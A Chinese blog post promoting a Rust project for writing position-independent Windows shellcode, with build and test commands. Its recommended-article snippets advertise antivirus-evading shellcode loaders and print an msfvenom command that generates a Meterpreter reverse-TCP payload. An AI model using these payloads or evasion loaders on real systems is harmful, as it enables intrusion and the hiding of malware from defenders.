使用Rust编写Windows Shellcode:简洁与效率的完美结合

最新推荐文章于 2024-06-01 10:03:26 发布
最新推荐文章于 2024-06-01 10:03:26 发布
阅读量577 收藏 19
点赞数 10
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00095/article/details/139255666
版权

使用Rust编写Windows Shellcode:简洁与效率的完美结合

项目简介

这个开源项目是一个创新的方式,它允许你在Rust中编写Windows Shellcode,最终编译成一个PE文件,仅包含.text节区且没有外部依赖。通过这个项目,你可以体验到Rust语言的安全性与Shellcode的高效性相结合的魅力。该项目受到了masm_shc项目启发,旨在简化Shellcode的创建和调试过程。

(图片展示了在PE-Bear中查看shellcode.exe的.text节区)

编译与运行

本项目已在Win10 x64环境下测试。首先确保你的Rust环境为nightly,并切换到相应目标平台:

rustup default nightly-x86_64-pc-windows-msvc
cd shellcode/
cargo build --release

这将生成shellcode\target\x86_64-pc-windows-msvc\release\shellcode.exe。接着,执行以下命令进行处理:

cd ..
cargo run

这会把.text节区导出并做必要的调整,形成shellcode.bin作为最终的Shellcode文件。

为了测试Shellcode,你可以使用作者提供的工具rs_shellcode:

git clone https://github.com/b1tg/rs_shellcode
cd rs_shellcode/
cargo build
./target/debug/rs_shellcode.exe -f "shellcode\target\x86_64-pc-windows-msvc\release\shellcode.bin"

测试示例的Shellcode会在屏幕上弹出消息框并在系统日志中留下信息,可使用DebugView或Windbg查看。

(图片展示运行shellcode的效果)

应用场景和技术分析

这个项目适用于任何需要在Windows环境中部署自定义低级代码的情景,如安全研究、逆向工程、漏洞利用开发等。Rust的静态类型检查和内存安全性特性使其在编写Shellcode时更加可靠,减少了传统汇编语言可能遇到的错误。

项目利用了Rust编译器生成的最小化PE文件结构,以及对PE文件格式的深入理解,使得生成的Shellcode紧凑且易于移植。此外,通过动态修补代码以实现位置独立性,可以在多种上下文中灵活地注入和执行Shellcode。

项目特点

  1. Rust语言支持:利用Rust的安全特性和现代编程风格编写Shellcode。
  2. 无依赖PE文件:生成的二进制文件只包含必需的.text节区。
  3. 位置无关性:通过对代码的简单调整,可以使其在任意地址下运行。
  4. 自动化处理:提供脚本自动完成从编译到提取Shellcode的全部流程。

通过这个项目,无论你是经验丰富的开发者还是初学者,都能更方便地探索和使用Windows Shellcode。赶快尝试一下,感受Rust与Shellcode结合带来的全新体验吧!

计蕴斯Lowell
关注
  • 10
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Rust使用Rust实现一个简单的shell
数字人生
02-12 1637
在创建一个能和成熟shell(如bash或zsh)竞争的程序方面还有很长的路要走,但这个基本版本足够用于理解如何在Rust中开始这类型的项目。:Rust拥有一个完善的工具链和生态系统,包括包管理器Cargo、文档生成器rustdoc、构建工具rustc等。:Rust内置了对并发编程的支持,通过其独特的所有权系统和借用检查器来防止数据竞争和其他并发问题。制作一个简单的shell是一项很好的学习项目,尤其是当涉及到Unix系统编程和Rust的系统级能力时。以下是一个使用Rust实现的简单shell的基础框架。
Rust免杀 Shellcode加载与混淆
stopluox的博客
09-19 200
下面是实现AES-CFB加解密的代码,在加密的函数中最终返回的是Hex编码后的字符串,而解密函数最终返回的是Vec数组,同样是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode。下面是实现RC4加解密的代码,在加密的函数中最终返回的是Base64编码后的字符串,而解密函数最终返回的是Vec数组,这是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode
rust-windows-shellcode:Rust中的Windows Shellcode开发
03-05
Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法来自的项目 。 如何建造 (仅在Win10 x64上测试过) 构建shellcode二进制文件 rustup default nightly-x86_64-pc-windows-msvc cd shellcode/ cargo build --release 如果一切顺利,我们将获得shellcode\target\x86_64-pc-windows-msvc\release\shellcode.exe 转储.text部分并做一些补丁 我们在.text部分的开头打补丁,使其跳转到入口点。 这样,我们可以在合并部分中存储一些字符串
Rust免杀 w Shellcode加载与混淆
S18374的博客
10-25 143
Rust的编译体积是非常小的,虽然比不上C/C++,但是和Python和Go相比优势还是非常大的,并且Rust的热门程度也远小于Python和Go,所以杀软对Rust的检出程度也是非常低的,这都是Rust免杀的天然优势。结合本文章几种基础的加载方式和混淆方式还是可以轻松过一部分杀软的。以下链接是我半年前上传到virustotal的一个样本,半年过去了,目前的检出率为14/71:VirusTotal File(刚上传时检出率为0/71)。
Rust Shellcode: 高级安全工具的未来
最新发布
gitblog_00047的博客
06-01 250
Rust Shellcode: 高级安全工具的未来 rust-shellcode???? windows-rs shellcode loaders ????项目地址:https://gitcode.com/gh_mirrors/ru/rust-shellcode 在这个数字时代,安全攻防战日益激烈,而Rust Shellcode正是在这场战斗中的一把利剑。这个开源项目为进攻性安全活动提供了基础支持,是渗透测...
Rust免杀 w Shellcode加载与混淆88
Y7472821的博客
10-26 52
Rust的编译体积是非常小的,虽然比不上C/C++,但是和Python和Go相比优势还是非常大的,并且Rust的热门程度也远小于Python和Go,所以杀软对Rust的检出程度也是非常低的,这都是Rust免杀的天然优势。结合本文章几种基础的加载方式和混淆方式还是可以轻松过一部分杀软的。以下链接是我半年前上传到virustotal的一个样本,半年过去了,目前的检出率为14/71:VirusTotal File(刚上传时检出率为0/71)。
Shellcode技术杂谈
Fido
02-04 733
本文转载自网络:Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shellcode,因此掌握Shellcode编写技术就显得尤为重要。       
Shellcode
沉寂的孤城
10-04 865
转载请注明出处:http://blog.csdn.net/wangxiaolong_china   Shellcode是一段机器指令,用于在溢出之后改变系统的正常流程,转而执行Shellcode从而完成渗透测试者得功能。     有关shellcode的研究,可以参考如下经典网站: http://www.projectshellcode.com/
wasm-rust-chip8:使用Rust编写的WebAssembly CHIP-8模拟器
02-05
一个用Rust编写并编译为WebAssembly的CHIP-8模拟器。 就是图个好玩儿! 该代码在随附的博客文章中进行了描述: : 建造 该项目使用相对较新的wasm32-unknown-unknown目标,可以根据启用它。 安装完成后,只需运行...
rust-mandelbrot:使用rust-sfml用Rust编写的Maldelbrot集查看器
05-11
使用SFML( )和rust-sfml( )生成并显示图像。 ##安装 在Linux 64位系统上运行(仅在Debian Jessie-amd64上进行了测试),但在大多数OS上均应运行。 ###先决条件 确保已安装SFML和CSFML 2.0(可在上)。 您还...
用于解码基于Alpha2的shellcodeRust命令行工具。-Rust开发
05-27
alpha_decoder是用于解码基于Alpha2的shellcodeRust命令行工具。 alpha_decoder alpha_decoder是用于解码基于Alpha2的shellcodeRust命令行工具。 支持的格式混合大小写ASCII大写ASCII混合大小写Unicode大写Unicode mixedcase_ascii_nocompress uppercase_ascii_nocompress mixedcase_unicode_nocompress uppercase_unicode_nocompress路线图该工具目前正在开发中。 这是一个大致的工作清单:实现其余格式(请参见上文)创建用于识别和解析Alpha2格式的正确API Expos
Vs Code 配置rust环境(windows
01-03
目录一、安装rust二、安装Vs Code插件 一、安装rust 下载rust工具: 点击下载rustup-init | ​win.rustup.rs 安装rust:打开rustup-init.exe 安装有2种选择,gnu或者msvc工具链 gnu(本文使用MinGW-w64)占用空间小(500M),对于初步的rust使用足够了。 msvc(本文使用Visual Studio Build Tools,包含msvc,clang等)占用空间大(2G)。 MinGW-w64安装:点击进入 ,找到x86_64-win32-seh下载后解压,在环境变量中配置 ·解压目录/bin·,在cmd中使用gc
windows平台下功能性shellcode编写
11-12
windows平台下功能性shellcode编写,通过高级语言编写shellcode
go-shellcode:将Shellcode加载到新进程中
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
black-hat-rust:使用Rust应用进攻性安全-早期访问-https
03-05
黑帽Rust-抢先体验 使用Rust编程语言深入研究攻击性安全 概括 不管是在电影中还是在主流媒体中,黑客通常都被浪漫化:他们被描绘成黑魔法师,讨厌的罪犯,或者在最坏的情况下被描绘成带有兜帽和撬棍的盗贼。 实际上,从无聊的少年探索互联网到主权国家的军队以及不满的前雇员,攻击者的形象范围非常大。 攻击者的动机是什么? 他们如何看起来如此容易地闯入任何网络? 他们如何对待受害者? 我们将戴上黑帽子,探索进攻性安全的世界,无论是网络攻击,网络犯罪还是网络战争。 扫描程序,漏洞利用,网络钓鱼工具包,植入物...从理论到实践,我们将探索进攻安全性的奥秘,并使用Rust编程语言(Stack Overflow最受欢迎的语言)连续五年来构建自己的进攻工具。 安全编程字段由其极大的范围定义(从shellcode到服务器和Web应用程序)。 由于其无与伦比的保证和功能集,Rust是一种期待已久的“一刀切”
rust-linalg:专为与Rust编写的WebGLOpenGL一起使用而设计的小型线性代数库
04-03
锈林纳格 专为与Rust编写的WebGL / OpenGL一起使用而设计的小型线性代数库
rust-snake使用rust编写的贪吃蛇游戏
03-08
rust-snake使用rust编写的贪吃蛇游戏 仅供学习参考。 rust-snake使用rust编写的贪吃蛇游戏 仅供学习参考。 rust-snake使用rust编写的贪吃蛇游戏 仅供学习参考。 rust-snake使用rust编写的贪吃蛇游戏 仅供学习参考。...
Rust编程语言:安全与性能的完美结合
Rust是一门结合了系统级编程语言的性能和现代编程语言的安全性的语言,它为开发者提供了编写高性能、安全代码的新途径。通过理解和掌握Rust,程序员可以在不牺牲安全性的情况下追求更高的效率,这正是Rust设计的核心...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

计蕴斯Lowell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值